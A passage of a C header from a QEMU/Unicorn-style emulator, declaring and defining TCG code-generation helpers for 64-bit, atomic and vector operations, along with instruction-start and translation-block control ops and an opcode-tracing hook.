*tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i64(tcg_ctx, INDEX_op_ld16u_i64, ret, arg2, offset); } static inline void tcg_gen_ld16s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i64(tcg_ctx, INDEX_op_ld16s_i64, ret, arg2, offset); } static inline void tcg_gen_ld32u_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i64(tcg_ctx, INDEX_op_ld32u_i64, ret, arg2, offset); } static inline void tcg_gen_ld32s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i64(tcg_ctx, INDEX_op_ld32s_i64, ret, arg2, offset); } static inline void tcg_gen_ld_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i64(tcg_ctx, INDEX_op_ld_i64, ret, arg2, offset); } static 
inline void tcg_gen_st8_i64(TCGContext *tcg_ctx, TCGv_i64 arg1, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i64(tcg_ctx, INDEX_op_st8_i64, arg1, arg2, offset); } static inline void tcg_gen_st16_i64(TCGContext *tcg_ctx, TCGv_i64 arg1, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i64(tcg_ctx, INDEX_op_st16_i64, arg1, arg2, offset); } static inline void tcg_gen_st32_i64(TCGContext *tcg_ctx, TCGv_i64 arg1, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i64(tcg_ctx, INDEX_op_st32_i64, arg1, arg2, offset); } static inline void tcg_gen_st_i64(TCGContext *tcg_ctx, TCGv_i64 arg1, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_ldst_op_i64(tcg_ctx, INDEX_op_st_i64, arg1, arg2, offset); } static inline void tcg_gen_add_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { tcg_gen_op3_i64(tcg_ctx, INDEX_op_add_i64, ret, arg1, arg2); } static inline void tcg_gen_sub_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { uc_engine *uc = tcg_ctx->uc; if (HOOK_EXISTS_BOUNDED(uc, UC_HOOK_TCG_OPCODE, tcg_ctx->pc_start)) { struct hook *hook; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(uc, hook, UC_HOOK_TCG_OPCODE) { if (hook->to_delete) continue; if (hook->op == UC_TCG_OP_SUB && hook->op_flags == 0) { gen_uc_traceopcode(tcg_ctx, hook, arg1, arg2, 64, uc, tcg_ctx->pc_start); } } } tcg_gen_op3_i64(tcg_ctx, INDEX_op_sub_i64, ret, arg1, arg2); } static inline void tcg_gen_and_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { tcg_gen_op3_i64(tcg_ctx, INDEX_op_and_i64, ret, arg1, arg2); } static inline void tcg_gen_or_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { tcg_gen_op3_i64(tcg_ctx, INDEX_op_or_i64, ret, arg1, arg2); } static inline void tcg_gen_xor_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { tcg_gen_op3_i64(tcg_ctx, INDEX_op_xor_i64, ret, arg1, arg2); } static inline void tcg_gen_shl_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { tcg_gen_op3_i64(tcg_ctx, INDEX_op_shl_i64, ret, arg1, arg2); } static inline void tcg_gen_shr_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { tcg_gen_op3_i64(tcg_ctx, INDEX_op_shr_i64, ret, arg1, arg2); } static inline void tcg_gen_sar_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { tcg_gen_op3_i64(tcg_ctx, INDEX_op_sar_i64, ret, arg1, arg2); } static inline void tcg_gen_mul_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { tcg_gen_op3_i64(tcg_ctx, INDEX_op_mul_i64, ret, arg1, arg2); } #else /* TCG_TARGET_REG_BITS == 32 */ static inline void tcg_gen_st8_i64(TCGContext *tcg_ctx, TCGv_i64 arg1, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_st8_i32(tcg_ctx, TCGV_LOW(tcg_ctx, arg1), arg2, offset); } static inline void tcg_gen_st16_i64(TCGContext *tcg_ctx, TCGv_i64 arg1, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_st16_i32(tcg_ctx, TCGV_LOW(tcg_ctx, arg1), arg2, offset); } static inline void tcg_gen_st32_i64(TCGContext *tcg_ctx, TCGv_i64 arg1, TCGv_ptr arg2, tcg_target_long offset) { tcg_gen_st_i32(tcg_ctx, TCGV_LOW(tcg_ctx, arg1), arg2, offset); } static inline void tcg_gen_add_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { tcg_gen_add2_i32(tcg_ctx, TCGV_LOW(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), TCGV_HIGH(tcg_ctx, arg1), TCGV_LOW(tcg_ctx, arg2), TCGV_HIGH(tcg_ctx, arg2)); } static inline void tcg_gen_sub_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2) { tcg_gen_sub2_i32(tcg_ctx, 
TCGV_LOW(tcg_ctx, ret), TCGV_HIGH(tcg_ctx, ret), TCGV_LOW(tcg_ctx, arg1), TCGV_HIGH(tcg_ctx, arg1), TCGV_LOW(tcg_ctx, arg2), TCGV_HIGH(tcg_ctx, arg2)); } void tcg_gen_discard_i64(TCGContext *tcg_ctx, TCGv_i64 arg); void tcg_gen_mov_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg); void tcg_gen_movi_i64(TCGContext *tcg_ctx, TCGv_i64 ret, int64_t arg); void tcg_gen_ld8u_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset); void tcg_gen_ld8s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset); void tcg_gen_ld16u_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset); void tcg_gen_ld16s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset); void tcg_gen_ld32u_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset); void tcg_gen_ld32s_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset); void tcg_gen_ld_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_ptr arg2, tcg_target_long offset); void tcg_gen_st_i64(TCGContext *tcg_ctx, TCGv_i64 arg1, TCGv_ptr arg2, tcg_target_long offset); void tcg_gen_and_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_or_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_xor_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_shl_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_shr_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_sar_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); void tcg_gen_mul_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg1, TCGv_i64 arg2); #endif /* TCG_TARGET_REG_BITS */ static inline void tcg_gen_neg_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 arg) { if (TCG_TARGET_HAS_neg_i64) { tcg_gen_op2_i64(tcg_ctx, INDEX_op_neg_i64, ret, arg); } else { tcg_gen_subfi_i64(tcg_ctx, ret, 0, arg); } } /* Size changing operations. */ void tcg_gen_extu_i32_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i32 arg); void tcg_gen_ext_i32_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i32 arg); void tcg_gen_concat_i32_i64(TCGContext *tcg_ctx, TCGv_i64 dest, TCGv_i32 low, TCGv_i32 high); void tcg_gen_extrl_i64_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i64 arg); void tcg_gen_extrh_i64_i32(TCGContext *tcg_ctx, TCGv_i32 ret, TCGv_i64 arg); void tcg_gen_extr_i64_i32(TCGContext *tcg_ctx, TCGv_i32 lo, TCGv_i32 hi, TCGv_i64 arg); void tcg_gen_extr32_i64(TCGContext *tcg_ctx, TCGv_i64 lo, TCGv_i64 hi, TCGv_i64 arg); static inline void tcg_gen_concat32_i64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv_i64 lo, TCGv_i64 hi) { tcg_gen_deposit_i64(tcg_ctx, ret, lo, hi, 32, 32); } /* QEMU specific operations. 
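These helpers are compiled per guest target: TARGET_LONG_BITS and TARGET_INSN_START_WORDS come from the QEMU target headers, hence the #error guard below. As an illustrative sketch (not code from this header), a front end built with TARGET_INSN_START_WORDS == 1 marks each guest instruction before emitting its ops: tcg_gen_insn_start(tcg_ctx, pc); where pc is assumed to stand for the translator's current guest program counter.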
*/ #ifndef TARGET_LONG_BITS #error must include QEMU headers #endif #if TARGET_INSN_START_WORDS == 1 # if TARGET_LONG_BITS <= TCG_TARGET_REG_BITS static inline void tcg_gen_insn_start(TCGContext *tcg_ctx, target_ulong pc) { tcg_gen_op1(tcg_ctx, INDEX_op_insn_start, pc); } # else static inline void tcg_gen_insn_start(TCGContext *tcg_ctx, target_ulong pc) { tcg_gen_op2(tcg_ctx, INDEX_op_insn_start, (uint32_t)pc, (uint32_t)(pc >> 32)); } # endif #elif TARGET_INSN_START_WORDS == 2 # if TARGET_LONG_BITS <= TCG_TARGET_REG_BITS static inline void tcg_gen_insn_start(TCGContext *tcg_ctx, target_ulong pc, target_ulong a1) { tcg_gen_op2(tcg_ctx, INDEX_op_insn_start, pc, a1); } # else static inline void tcg_gen_insn_start(TCGContext *tcg_ctx, target_ulong pc, target_ulong a1) { tcg_gen_op4(tcg_ctx, INDEX_op_insn_start, (uint32_t)pc, (uint32_t)(pc >> 32), (uint32_t)a1, (uint32_t)(a1 >> 32)); } # endif #elif TARGET_INSN_START_WORDS == 3 # if TARGET_LONG_BITS <= TCG_TARGET_REG_BITS static inline void tcg_gen_insn_start(TCGContext *tcg_ctx, target_ulong pc, target_ulong a1, target_ulong a2) { tcg_gen_op3(tcg_ctx, INDEX_op_insn_start, pc, a1, a2); } # else static inline void tcg_gen_insn_start(TCGContext *tcg_ctx, target_ulong pc, target_ulong a1, target_ulong a2) { tcg_gen_op6(tcg_ctx, INDEX_op_insn_start, (uint32_t)pc, (uint32_t)(pc >> 32), (uint32_t)a1, (uint32_t)(a1 >> 32), (uint32_t)a2, (uint32_t)(a2 >> 32)); } # endif #else # error "Unhandled number of operands to insn_start" #endif /** * tcg_gen_exit_tb() - output exit_tb TCG operation * @tb: The TranslationBlock from which we are exiting * @idx: Direct jump slot index, or exit request * * See tcg/README for more info about this TCG operation. * See also tcg.h and the block comment above TB_EXIT_MASK. * * For a normal exit from the TB, back to the main loop, @tb should * be NULL and @idx should be 0. Otherwise, @tb should be valid and * @idx should be one of the TB_EXIT_ values. */ void tcg_gen_exit_tb(TCGContext *tcg_ctx, TranslationBlock *tb, unsigned idx); /** * tcg_gen_goto_tb() - output goto_tb TCG operation * @idx: Direct jump slot index (0 or 1) * * See tcg/README for more info about this TCG operation. * * NOTE: In softmmu emulation, direct jumps with goto_tb are only safe within * the pages this TB resides in because we don't take care of direct jumps when * address mapping changes, e.g. in tlb_flush(). In user mode, there's only a * static address translation, so the destination address is always valid, TBs * are always invalidated properly, and direct jumps are reset when mapping * changes. */ void tcg_gen_goto_tb(TCGContext *tcg_ctx, unsigned idx); /** * tcg_gen_lookup_and_goto_ptr() - look up the current TB, jump to it if valid * @addr: Guest address of the target TB * * If the TB is not valid, jump to the epilogue. * * This operation is optional. If the TCG backend does not implement goto_ptr, * this op is equivalent to calling tcg_gen_exit_tb() with 0 as the argument. 
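As a hedged sketch of how these ops combine (dest, tb and cpu_pc below are assumptions standing for a target's destination address, current TranslationBlock and PC global, none of which are defined here): a branch whose destination is known at translation time is commonly emitted as tcg_gen_goto_tb(tcg_ctx, 0); tcg_gen_movi_tl(tcg_ctx, cpu_pc, dest); tcg_gen_exit_tb(tcg_ctx, tb, 0); so that slot 0 can later be patched into a direct jump, whereas an indirect branch updates cpu_pc and then calls tcg_gen_lookup_and_goto_ptr(tcg_ctx).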
*/ void tcg_gen_lookup_and_goto_ptr(TCGContext *tcg_ctx); #if TARGET_LONG_BITS == 32 #define tcg_temp_new tcg_temp_new_i32 #define tcg_global_reg_new tcg_global_reg_new_i32 #define tcg_global_mem_new tcg_global_mem_new_i32 #define tcg_temp_local_new tcg_temp_local_new_i32 #define tcg_temp_free tcg_temp_free_i32 #define tcg_gen_qemu_ld_tl tcg_gen_qemu_ld_i32 #define tcg_gen_qemu_st_tl tcg_gen_qemu_st_i32 #else #define tcg_temp_new tcg_temp_new_i64 #define tcg_global_reg_new tcg_global_reg_new_i64 #define tcg_global_mem_new tcg_global_mem_new_i64 #define tcg_temp_local_new tcg_temp_local_new_i64 #define tcg_temp_free tcg_temp_free_i64 #define tcg_gen_qemu_ld_tl tcg_gen_qemu_ld_i64 #define tcg_gen_qemu_st_tl tcg_gen_qemu_st_i64 #endif void tcg_gen_qemu_ld_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGArg, MemOp); void tcg_gen_qemu_st_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGArg, MemOp); void tcg_gen_qemu_ld_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGArg, MemOp); void tcg_gen_qemu_st_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGArg, MemOp); static inline void tcg_gen_qemu_ld8u(TCGContext *tcg_ctx, TCGv ret, TCGv addr, int mem_index) { tcg_gen_qemu_ld_tl(tcg_ctx, ret, addr, mem_index, MO_UB); } static inline void tcg_gen_qemu_ld8s(TCGContext *tcg_ctx, TCGv ret, TCGv addr, int mem_index) { tcg_gen_qemu_ld_tl(tcg_ctx, ret, addr, mem_index, MO_SB); } static inline void tcg_gen_qemu_ld16u(TCGContext *tcg_ctx, TCGv ret, TCGv addr, int mem_index) { tcg_gen_qemu_ld_tl(tcg_ctx, ret, addr, mem_index, MO_TEUW); } static inline void tcg_gen_qemu_ld16s(TCGContext *tcg_ctx, TCGv ret, TCGv addr, int mem_index) { tcg_gen_qemu_ld_tl(tcg_ctx, ret, addr, mem_index, MO_TESW); } static inline void tcg_gen_qemu_ld32u(TCGContext *tcg_ctx, TCGv ret, TCGv addr, int mem_index) { tcg_gen_qemu_ld_tl(tcg_ctx, ret, addr, mem_index, MO_TEUL); } static inline void tcg_gen_qemu_ld32s(TCGContext *tcg_ctx, TCGv ret, TCGv addr, int mem_index) { tcg_gen_qemu_ld_tl(tcg_ctx, ret, addr, mem_index, MO_TESL); } static inline void tcg_gen_qemu_ld64(TCGContext *tcg_ctx, TCGv_i64 ret, TCGv addr, int mem_index) { tcg_gen_qemu_ld_i64(tcg_ctx, ret, addr, mem_index, MO_TEQ); } static inline void tcg_gen_qemu_st8(TCGContext *tcg_ctx, TCGv arg, TCGv addr, int mem_index) { tcg_gen_qemu_st_tl(tcg_ctx, arg, addr, mem_index, MO_UB); } static inline void tcg_gen_qemu_st16(TCGContext *tcg_ctx, TCGv arg, TCGv addr, int mem_index) { tcg_gen_qemu_st_tl(tcg_ctx, arg, addr, mem_index, MO_TEUW); } static inline void tcg_gen_qemu_st32(TCGContext *tcg_ctx, TCGv arg, TCGv addr, int mem_index) { tcg_gen_qemu_st_tl(tcg_ctx, arg, addr, mem_index, MO_TEUL); } static inline void tcg_gen_qemu_st64(TCGContext *tcg_ctx, TCGv_i64 arg, TCGv addr, int mem_index) { tcg_gen_qemu_st_i64(tcg_ctx, arg, addr, mem_index, MO_TEQ); } void tcg_gen_atomic_cmpxchg_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_cmpxchg_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_xchg_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_xchg_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_fetch_add_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_fetch_add_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_fetch_and_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_fetch_and_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, 
TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_fetch_or_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_fetch_or_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_fetch_xor_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_fetch_xor_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_fetch_smin_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_fetch_smin_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_fetch_umin_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_fetch_umin_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_fetch_smax_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_fetch_smax_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_fetch_umax_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_fetch_umax_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_add_fetch_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_add_fetch_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_and_fetch_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_and_fetch_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_or_fetch_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_or_fetch_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_xor_fetch_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_xor_fetch_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_smin_fetch_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_smin_fetch_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_umin_fetch_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_umin_fetch_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_smax_fetch_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_smax_fetch_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_atomic_umax_fetch_i32(TCGContext *tcg_ctx, TCGv_i32, TCGv, TCGv_i32, TCGArg, MemOp); void tcg_gen_atomic_umax_fetch_i64(TCGContext *tcg_ctx, TCGv_i64, TCGv, TCGv_i64, TCGArg, MemOp); void tcg_gen_mov_vec(TCGContext *tcg_ctx, TCGv_vec, TCGv_vec); void tcg_gen_dup_i32_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec, TCGv_i32); void tcg_gen_dup_i64_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec, TCGv_i64); void tcg_gen_dup_mem_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec, TCGv_ptr, tcg_target_long); void tcg_gen_dup8i_vec(TCGContext *tcg_ctx, TCGv_vec, uint32_t); void tcg_gen_dup16i_vec(TCGContext *tcg_ctx, TCGv_vec, uint32_t); void tcg_gen_dup32i_vec(TCGContext *tcg_ctx, TCGv_vec, uint32_t); void tcg_gen_dup64i_vec(TCGContext *tcg_ctx, TCGv_vec, uint64_t); void tcg_gen_dupi_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec, uint64_t); void tcg_gen_add_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_sub_vec(TCGContext 
*tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_mul_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_and_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_or_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_xor_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_andc_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_orc_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_nand_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_nor_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_eqv_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_not_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a); void tcg_gen_neg_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a); void tcg_gen_abs_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a); void tcg_gen_ssadd_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_usadd_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_sssub_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_ussub_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_smin_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_umin_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_smax_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_umax_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_shli_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, int64_t i); void tcg_gen_shri_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, int64_t i); void tcg_gen_sari_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, int64_t i); void tcg_gen_shls_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_i32 s); void tcg_gen_shrs_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_i32 s); void tcg_gen_sars_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_i32 s); void tcg_gen_shlv_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec s); void tcg_gen_shrv_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec s); void tcg_gen_sarv_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec s); void tcg_gen_cmp_vec(TCGContext *tcg_ctx, TCGCond cond, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b); void tcg_gen_bitsel_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b, TCGv_vec c); void tcg_gen_cmpsel_vec(TCGContext *tcg_ctx, TCGCond cond, unsigned vece, TCGv_vec r, TCGv_vec a, TCGv_vec b, TCGv_vec c, TCGv_vec d); void tcg_gen_ld_vec(TCGContext *tcg_ctx, TCGv_vec r, TCGv_ptr base, TCGArg offset); void tcg_gen_st_vec(TCGContext *tcg_ctx, TCGv_vec r, TCGv_ptr base, TCGArg offset); void tcg_gen_stl_vec(TCGContext *tcg_ctx, TCGv_vec r, TCGv_ptr base, TCGArg offset, TCGType t); #if TARGET_LONG_BITS == 64 #define tcg_gen_movi_tl tcg_gen_movi_i64 #define tcg_gen_mov_tl tcg_gen_mov_i64 #define tcg_gen_ld8u_tl tcg_gen_ld8u_i64 #define 
tcg_gen_ld8s_tl tcg_gen_ld8s_i64 #define tcg_gen_ld16u_tl tcg_gen_ld16u_i64 #define tcg_gen_ld16s_tl tcg_gen_ld16s_i64 #define tcg_gen_ld32u_tl tcg_gen_ld32u_i64 #define tcg_gen_ld32s_tl tcg_gen_ld32s_i64 #define tcg_gen_ld_tl tcg_gen_ld_i64 #define tcg_gen_st8_tl tcg_gen_st8_i64 #define tcg_gen_st16_tl tcg_gen_st16_i64 #define tcg_gen_st32_tl tcg_gen_st32_i64 #define tcg_gen_st_tl tcg_gen_st_i64 #define tcg_gen_add_tl tcg_gen_add_i64 #define tcg_gen_addi_tl tcg_gen_addi_i64 #define tcg_gen_sub_tl tcg_gen_sub_i64 #define tcg_gen_neg_tl tcg_gen_neg_i64 #define tcg_gen_abs_tl tcg_gen_abs_i64 #define tcg_gen_subfi_tl tcg_gen_subfi_i64 #define tcg_gen_subi_tl tcg_gen_subi_i64 #define tcg_gen_and_tl tcg_gen_and_i64 #define tcg_gen_andi_tl tcg_gen_andi_i64 #define tcg_gen_or_tl tcg_gen_or_i64 #define tcg_gen_ori_tl tcg_gen_ori_i64 #define tcg_gen_xor_tl tcg_gen_xor_i64 #define tcg_gen_xori_tl tcg_gen_xori_i64 #define tcg_gen_not_tl tcg_gen_not_i64 #define tcg_gen_shl_tl tcg_gen_shl_i64 #define tcg_gen_shli_tl tcg_gen_shli_i64 #define tcg_gen_shr_tl tcg_gen_shr_i64 #define tcg_gen_shri_tl tcg_gen_shri_i64 #define tcg_gen_sar_tl tcg_gen_sar_i64 #define tcg_gen_sari_tl tcg_gen_sari_i64 #define tcg_gen_brcond_tl tcg_gen_brcond_i64 #define tcg_gen_brcondi_tl tcg_gen_brcondi_i64 #define tcg_gen_setcond_tl tcg_gen_setcond_i64 #define tcg_gen_setcondi_tl tcg_gen_setcondi_i64 #define tcg_gen_mul_tl tcg_gen_mul_i64 #define tcg_gen_muli_tl tcg_gen_muli_i64 #define tcg_gen_div_tl tcg_gen_div_i64 #define tcg_gen_rem_tl tcg_gen_rem_i64 #define tcg_gen_divu_tl tcg_gen_divu_i64 #define tcg_gen_remu_tl tcg_gen_remu_i64 #define tcg_gen_discard_tl tcg_gen_discard_i64 #define tcg_gen_trunc_tl_i32 tcg_gen_extrl_i64_i32 #define tcg_gen_trunc_i64_tl tcg_gen_mov_i64 #define tcg_gen_extu_i32_tl tcg_gen_extu_i32_i64 